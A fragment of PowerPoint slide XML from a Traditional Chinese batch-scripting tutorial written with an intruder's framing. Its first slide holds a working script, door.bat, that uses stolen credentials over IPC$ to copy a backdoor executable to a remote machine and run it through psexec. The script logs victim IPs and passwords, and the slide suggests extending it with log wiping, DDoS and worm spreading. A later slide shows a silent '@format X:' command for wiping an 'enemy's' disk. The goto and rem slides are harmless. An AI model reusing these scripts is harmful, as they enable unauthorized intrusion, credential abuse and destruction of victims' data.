            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>--------------- cut here then save as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>batchfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(I call it main.bat ) ---------------------------</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 cut here then save as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>batchfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(I call it door.bat) -----------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@net use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\%1\ipc$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> %3 /u:\%2\</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> failed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo Trying to establish the IPC$ connection …………OK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@copy windrv32.exe\\%1\admin$\system32 &amp;&amp; if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 1 echo IP %1 USER %2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> PWD %3 &gt;&gt;ko.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\%1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> c:\winnt\system32\windrv32.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\%1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> net start windrv32 &amp;&amp; if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 1 echo %1 Backdoored &gt;&gt;ko.t</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>xt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:failed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo Sorry can not connected to the victim.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這只是一個自動種植後門批處理的雛形，兩個批處理和後門程序（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windrv32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,PSexec.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>需放在統一目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>批處理內容尚可擴展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>加入清除日誌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>+DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>加入定時添加用戶的功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>更深入一點可以使之具備自動傳播功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>蠕蟲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>此處不多做敘述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有興趣的朋友可自行研究</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322432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BC181-D933-4D69-9160-29D3C6CC7BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D63BA6-1501-4F76-9D00-ABCF8872CEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示不顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬盤）自然不能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>讓對方看到你使用的命令啦。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo Now initializing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>program,please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> wait a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>minite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@format X: /q/u/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>autoset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個命令是不可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個參數的，可喜的是微軟留了個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>autoset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個參數給我們，效果和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是一樣的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166188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164E5-FAD2-488A-8E16-7676C3E66853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A803E54-58C9-415B-BE53-1EA42E7CCB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定跳轉到標籤，找到標籤後，程序將處理從下一行開始的命令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是參數，指定所要轉向的批處理程序中的行。）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if {%1}=={} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>noparms</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if {%2}=={} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>noparms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（如果這裡的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>你不明白的話，先跳過去，後面會有詳細的解釋。）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@Rem check parameters if null show usage</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>noparms</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo Usage: monitor.bat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ServerIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>PortNumber</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>標籤的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標籤，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令就是根據這個：來尋找下一步跳到到那裡。最好有一些說明這樣你別人看起來才會理解你的意圖啊。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167468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B70D-CD72-4D3B-9D94-A6A81AC56197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Rem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD26E4F-AC9E-425D-BCBB-3420E642D256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>註釋命令，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語言中相當與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/*--------*/,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>它並不會被執行，只是起一個註釋的作用，便於別人閱讀和你自己日後修改。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Rem Message</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
